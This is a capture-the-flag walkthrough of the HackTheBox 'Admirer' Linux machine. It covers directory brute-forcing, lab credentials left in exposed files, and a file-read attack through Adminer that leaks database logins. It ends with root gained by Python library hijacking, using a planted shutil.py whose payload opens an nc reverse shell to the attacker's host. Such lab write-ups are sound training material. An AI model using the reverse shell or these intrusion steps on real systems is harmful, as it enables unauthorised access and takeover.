HackTheBox — Admirer
Summary
Today we will take a look on easy linux machine With IP 10.10.10.187
Enumeration
Nmap
So we have 3 ports open: 21(FTP), 22(SSH), 80(HTTP)
In web page i try to check robots.txt file and it have:
User-agent: *# This folder contains personal contacts and creds, so no one -not even robots- should see it — waldo
Disallow: /admin-dir
I tried to see the content, but unfortunately i got an error 403 Forbidden, So i tried to bruteforce directory using gobuster
root@strike:~# gobuster dir -u http://10.10.10.187/admin-dir/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://10.10.10.187/admin-dir/
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Timeout: 10s
===============================================================
2020/06/05 23:18:48 Starting gobuster
===============================================================
/contact.txt (Status: 200)
/credentials.txt (Status: 200)
===============================================================
2020/06/05 23:22:42 Finished
===============================================================I check The credentials.txt
[Internal mail account]
w.cooper@admirer.htb
fgJr6q#S\W:$P
[FTP account]
ftpuser
%n?4Wz}R$tTF7
[Wordpress account]
admin
w0rdpr3ss01!Nice! we found FTP account username ftpuser and password %n?4WzR$tTF7
After connecting to the FTP service with ftpuser, We get 2 files
So i downloaded html.tar.gz file and extract, After extract…
I found more credentials in db_admin.php file
<?php
$servername = "localhost";
$username = "waldo";
$password = "Wh3r3_1s_w4ld0?";
// Create connection
$conn = new mysqli($servername, $username, $password);
// Check connection
if ($conn->connect_error) {
die("Connection failed: " . $conn->connect_error);
}
echo "Connected successfully";
// TODO: Finish implementing this or find a better open source alternative
?>Unfortunately, This page didn’t exist!
After some thinking, I think that machine name is very similar with adminer tool (It is a popular PHP tool to administer SQLite, MariaDB, MongoDB, Mysql,…), So i tried to use and it is work!
Exploitation
I tried to find CVE for adminer version 4.6.2, After few seconds found CVE-2016–5734
So i set mysql-server on machine, create a database, create a table with a single column, login to my database on the victim’s Adminer
Now i could dump all local file!
create database exploit;
use exploit;
create table dmp(content varchar(5000));After dumping index.php file, Now i getting some credentials from database and found one of them is waldo and the password is &<h5b~yK3F#{PaPB&dA}{H>, So i tried to connect to SSH with this credentials
Privilege Escalation
After few seconds i note that waldo can execute /opt/scripts/admin_tasks.sh as root!
Take a look on backup.py file
I think that I could change path where python will look for shutil, So if I change this path and create my shutil that let me to execute any script as root
So i go to tmp directory and made file shutil and create a python script named shutil.py
Python Script:
import os
def make_archive(a, b, c):
os.system('nc 10.10.x.xx 1337 -e "/bin/sh"')NOTE: don’t forget to change lhost!
Setup Listener
root@strike:~# nc -lnvp 1337
listening on [any] 1337 ...Run Script:
Now we get root privilege
root@strike:~# nc -lnvp 1337
listening on [any] 1337 ...
connect to [10.10.x.xx] from (UNKNOWN) [10.10.10.187] 52226
id
uid=0(root) gid=0(root) groups=0(root)Gain root flag!
If u learn any thing useful from write up, Respect me on HackTheBox
